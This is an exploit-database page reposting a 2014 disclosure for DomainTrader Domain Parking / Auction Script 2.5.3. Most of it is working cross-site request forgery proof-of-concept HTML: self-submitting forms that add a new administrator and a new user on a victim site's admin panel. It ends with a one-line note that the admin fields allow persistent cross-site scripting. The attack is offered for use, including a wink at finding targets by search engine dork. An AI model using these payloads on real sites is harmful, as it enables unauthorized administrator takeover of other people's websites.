Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DomainTrader Domain Parking / Auction Script 2.5.3 CSRF / XSS

🗓️ 28 Aug 2014 00:00:00Reported by Haider MahmoodType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 57 Views

Vulnerabilities in DomainTrader Domain Parking / Auction Script 2.5.

Code
`# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities  
# Google Dork: Find yourself xD  
# Date: 26/8/2014  
# Exploit Author: Haider Mahmood | @HaiderMQ  
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/  
# Version: Tested on Latest Version 2.5.3  
  
Add new administrator CSRF:  
  
  
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>  
<script type="text/javascript">  
$(document).ready(function() {  
window.document.forms[0].submit();  
});  
</script>  
<form name="add_admin" id="add_admin" method="post" action="victim.com/admin/admincp.php">  
<input type="hidden" name="mode" value="addadminuser" />  
<table width="400" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td>Username:</td>  
<td><input name="username" type="text" value="USERNAME" /></td>  
</tr>  
<tr>  
<td>Email Address:</td>  
<td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td>  
</tr>  
<tr>  
<td>Password:</td>  
<td><input name="password" type="text" value="DESIRED_PASSWORD" /></td>  
</tr>  
<tr>  
<td><input name="submit" type="submit" value="Add User" /></td>  
<td>&nbsp;</td>  
</tr>  
</table>  
</form>  
  
  
Add new user CSRF:  
  
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>  
<script type="text/javascript">  
$(document).ready(function() {  
window.document.forms[0].submit();  
});  
</script>  
<form name="add_user" id="add_user" method="post" action="victim.com/admin/admincp.php">  
<input type="hidden" name="mode" value="addnewuser">  
<table width="500" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td><span>Username:</span></td>  
<td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td>  
</tr>  
<tr>  
<td><span>Password:</span></td>  
<td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td>  
</tr>  
<tr>  
<td><span>Confirm Password:</span></td>  
<td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td>  
</tr>  
<tr>  
<td width="200"><span>First Name:</span></td>  
<td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td>  
</tr>  
<tr>  
<td><span>Last Name:</span></td>  
<td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td>  
</tr>  
<tr>  
<td><span>Email Address:</span></td>  
<td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td>  
</tr>  
<tr>  
<td><span>Telephone:</span></td>  
<td><input type="text" name="telephone" id="telephone" value="010101010"></td>  
</tr>  
<tr>  
<td><span>Street Address:</span></td>  
<td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>City:</span></td>  
<td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>County/State:</span></td>  
<td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>Postcode/Zipcode:</span></td>  
<td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>Country:</span></td>  
<td>  
<select name="country" id="country">  
<option value="AFGHANISTAN">AFGHANISTAN</option>  
<option value="ALBANIA">ALBANIA</option>  
<option value="ALGERIA">ALGERIA</option>  
<option value="AMERICAN SAMOA">AMERICAN SAMOA</option>  
<option value="ANDORRA">ANDORRA</option>  
<option value="ANGOLA">ANGOLA</option>  
<option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option>  
<option value="ARGENTINA">ARGENTINA</option>  
<option value="ARMENIA">ARMENIA</option>  
<option value="ARUBA">ARUBA</option>  
<option value="AUSTRALIA">AUSTRALIA</option>  
<option value="AUSTRIA">AUSTRIA</option>  
<option value="AZERBAIJAN">AZERBAIJAN</option>  
<option value="BAHAMAS">BAHAMAS</option>  
<option value="BAHRAIN">BAHRAIN</option>  
<option value="BANGLADESH">BANGLADESH</option>  
<option value="BARBADOS">BARBADOS</option>  
<option value="BELARUS">BELARUS</option>  
<option value="BELGIUM">BELGIUM</option>  
<option value="BELIZE">BELIZE</option>  
<option value="BENIN">BENIN</option>  
<option value="BERMUDA">BERMUDA</option>  
<option value="BHUTAN">BHUTAN</option>  
<option value="BOLIVIA">BOLIVIA</option>  
<option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option>  
<option value="BOTSWANA">BOTSWANA</option>  
<option value="BRAZIL">BRAZIL</option>  
<option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option>  
<option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option>  
<option value="BULGARIA">BULGARIA</option>  
<option value="BURKINA FASO">BURKINA FASO</option>  
<option value="BURUNDI">BURUNDI</option>  
<option value="CAMBODIA">CAMBODIA</option>  
<option value="CAMEROON">CAMEROON</option>  
<option value="CANADA">CANADA</option>  
<option value="CAPE VERDE">CAPE VERDE</option>  
<option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option>  
<option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option>  
<option value="CHAD">CHAD</option>  
<option value="CHILE">CHILE</option>  
<option value="CHINA">CHINA</option>  
<option value="COLOMBIA">COLOMBIA</option>  
<option value="COMOROS">COMOROS</option>  
<option value="CONGO">CONGO</option>  
<option value="COOK ISLANDS">COOK ISLANDS</option>  
<option value="COSTA RICA">COSTA RICA</option>  
<option value="COTE D'IVOIRE">COTE D'IVOIRE</option>  
<option value="CROATIA">CROATIA</option>  
<option value="CUBA">CUBA</option>  
<option value="CYPRUS">CYPRUS</option>  
<option value="CZECH REPUBLIC">CZECH REPUBLIC</option>  
<option value="DENMARK">DENMARK</option>  
<option value="DJIBOUTI">DJIBOUTI</option>  
<option value="DOMINICA">DOMINICA</option>  
<option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option>  
<option value="ECUADOR">ECUADOR</option>  
<option value="EGYPT">EGYPT</option>  
<option value="EL SALVADOR">EL SALVADOR</option>  
<option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option>  
<option value="ERITREA">ERITREA</option>  
<option value="ESTONIA">ESTONIA</option>  
<option value="ETHIOPIA">ETHIOPIA</option>  
<option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option>  
<option value="FAROE ISLANDS">FAROE ISLANDS</option>  
<option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option>  
<option value="FIJI">FIJI</option>  
<option value="FINLAND">FINLAND</option>  
<option value="FRANCE">FRANCE</option>  
<option value="FRENCH GUIANA">FRENCH GUIANA</option>  
<option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option>  
<option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option>  
<option value="GABON">GABON</option>  
<option value="GAMBIA">GAMBIA</option>  
<option value="GEORGIA">GEORGIA</option>  
<option value="GERMANY">GERMANY</option>  
<option value="GHANA">GHANA</option>  
<option value="GIBRALTAR">GIBRALTAR</option>  
<option value="GREECE">GREECE</option>  
<option value="GREENLAND">GREENLAND</option>  
<option value="GRENADA">GRENADA</option>  
<option value="GUADELOUPE">GUADELOUPE</option>  
<option value="GUAM">GUAM</option>  
<option value="GUATEMALA">GUATEMALA</option>  
<option value="GUINEA">GUINEA</option>  
<option value="GUINEA-BISSAU">GUINEA-BISSAU</option>  
<option value="GUYANA">GUYANA</option>  
<option value="HAITI">HAITI</option>  
<option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option>  
<option value="HONDURAS">HONDURAS</option>  
<option value="HONG KONG">HONG KONG</option>  
<option value="HUNGARY">HUNGARY</option>  
<option value="ICELAND">ICELAND</option>  
<option value="INDIA">INDIA</option>  
<option value="INDONESIA">INDONESIA</option>  
<option value="IRAQ">IRAQ</option>  
<option value="IRELAND">IRELAND</option>  
<option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option>  
<option value="ISRAEL">ISRAEL</option>  
<option value="ITALY">ITALY</option>  
<option value="JAMAICA">JAMAICA</option>  
<option value="JAPAN">JAPAN</option>  
<option value="JORDAN">JORDAN</option>  
<option value="KAZAKHSTAN">KAZAKHSTAN</option>  
<option value="KENYA">KENYA</option>  
<option value="KIRIBATI">KIRIBATI</option>  
<option value="KUWAIT">KUWAIT</option>  
<option value="KYRGYZSTAN">KYRGYZSTAN</option>  
<option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option>  
<option value="LATVIA">LATVIA</option>  
<option value="LEBANON">LEBANON</option>  
<option value="LESOTHO">LESOTHO</option>  
<option value="LIBERIA">LIBERIA</option>  
<option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option>  
<option value="LIECHTENSTEIN">LIECHTENSTEIN</option>  
<option value="LITHUANIA">LITHUANIA</option>  
<option value="LUXEMBOURG">LUXEMBOURG</option>  
<option value="MACAO">MACAO</option>  
<option value="MADAGASCAR">MADAGASCAR</option>  
<option value="MALAWI">MALAWI</option>  
<option value="MALAYSIA">MALAYSIA</option>  
<option value="MALDIVES">MALDIVES</option>  
<option value="MALI">MALI</option>  
<option value="MALTA">MALTA</option>  
<option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option>  
<option value="MARTINIQUE">MARTINIQUE</option>  
<option value="MAURITANIA">MAURITANIA</option>  
<option value="MAURITIUS">MAURITIUS</option>  
<option value="MEXICO">MEXICO</option>  
<option value="MONACO">MONACO</option>  
<option value="MONGOLIA">MONGOLIA</option>  
<option value="MOROCCO">MOROCCO</option>  
<option value="MOZAMBIQUE">MOZAMBIQUE</option>  
<option value="MYANMAR">MYANMAR</option>  
<option value="NAMIBIA">NAMIBIA</option>  
<option value="NAURU">NAURU</option>  
<option value="NEPAL">NEPAL</option>  
<option value="NETHERLANDS">NETHERLANDS</option>  
<option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option>  
<option value="NEW CALEDONIA">NEW CALEDONIA</option>  
<option value="NEW ZEALAND">NEW ZEALAND</option>  
<option value="NICARAGUA">NICARAGUA</option>  
<option value="NIGER">NIGER</option>  
<option value="NIGERIA">NIGERIA</option>  
<option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option>  
<option value="NORWAY">NORWAY</option>  
<option value="OMAN">OMAN</option>  
<option value="PAKISTAN">PAKISTAN</option>  
<option value="PALAU">PALAU</option>  
<option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option>  
<option value="PANAMA">PANAMA</option>  
<option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option>  
<option value="PARAGUAY">PARAGUAY</option>  
<option value="PERU">PERU</option>  
<option value="PHILIPPINES">PHILIPPINES</option>  
<option value="POLAND">POLAND</option>  
<option value="PORTUGAL">PORTUGAL</option>  
<option value="PUERTO RICO">PUERTO RICO</option>  
<option value="QATAR">QATAR</option>  
<option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option>  
<option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option>  
<option value="REUNION">REUNION</option>  
<option value="ROMANIA">ROMANIA</option>  
<option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option>  
<option value="RWANDA">RWANDA</option>  
<option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option>  
<option value="SAINT LUCIA">SAINT LUCIA</option>  
<option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option>  
<option value="SAMOA">SAMOA</option>  
<option value="SAN MARINO">SAN MARINO</option>  
<option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option>  
<option value="SAUDI ARABIA">SAUDI ARABIA</option>  
<option value="SENEGAL">SENEGAL</option>  
<option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option>  
<option value="SEYCHELLES">SEYCHELLES</option>  
<option value="SIERRA LEONE">SIERRA LEONE</option>  
<option value="SINGAPORE">SINGAPORE</option>  
<option value="SLOVAKIA">SLOVAKIA</option>  
<option value="SLOVENIA">SLOVENIA</option>  
<option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option>  
<option value="SOMALIA">SOMALIA</option>  
<option value="SOUTH AFRICA">SOUTH AFRICA</option>  
<option value="SPAIN">SPAIN</option>  
<option value="SRI LANKA">SRI LANKA</option>  
<option value="SUDAN">SUDAN</option>  
<option value="SURINAME">SURINAME</option>  
<option value="SWAZILAND">SWAZILAND</option>  
<option value="SWEDEN">SWEDEN</option>  
<option value="SWITZERLAND">SWITZERLAND</option>  
<option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option>  
<option value="TAIWAN">TAIWAN</option>  
<option value="TAJIKISTAN">TAJIKISTAN</option>  
<option value="THAILAND">THAILAND</option>  
<option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option>  
<option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option>  
<option value="TIMOR-LESTE">TIMOR-LESTE</option>  
<option value="TOGO">TOGO</option>  
<option value="TOKELAU">TOKELAU</option>  
<option value="TONGA">TONGA</option>  
<option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option>  
<option value="TUNISIA">TUNISIA</option>  
<option value="TURKEY">TURKEY</option>  
<option value="TURKMENISTAN">TURKMENISTAN</option>  
<option value="TUVALU">TUVALU</option>  
<option value="UGANDA">UGANDA</option>  
<option value="UKRAINE">UKRAINE</option>  
<option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option>  
<option value="UNITED KINGDOM">UNITED KINGDOM</option>  
<option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option>  
<option value="UNITED STATES">UNITED STATES</option>  
<option value="URUGUAY">URUGUAY</option>  
<option value="UZBEKISTAN">UZBEKISTAN</option>  
<option value="VANUATU">VANUATU</option>  
<option value="VENEZUELA">VENEZUELA</option>  
<option value="VIET NAM">VIET NAM</option>  
<option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>  
<option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>  
<option value="YEMEN">YEMEN</option>  
<option value="ZAMBIA">ZAMBIA</option>  
<option value="ZIMBABWE">ZIMBABWE</option>  
</select>  
</td>  
</tr>  
<tr>  
<td colspan="2"><input name="new_message_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new message.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="offer_received_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new offer.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is accepted.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is cancelled</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1" /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1" /><span>Notify me by email when a domain is pushed.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1" /><span>Notify me by email when a domain sale is complete.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input type="submit" name="Submit" value="Submit"></td>  
</tr>  
</table>  
</form>  
  
  
XSS:  
  
Add new Administrator values are not properly sanitized, neither on inserting into the database or selecting from the database causing Persistent XSS  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Aug 2014 00:00Current
0.9Low risk
Vulners AI Score0.9
exploitcsrfxsssmartscriptsolutionsscriptvulnerabilitiesdomaintraderadminuserformsecurity0dayversion 2.5.3jqueryinjectioncross-site scriptingwebsitedata breach
57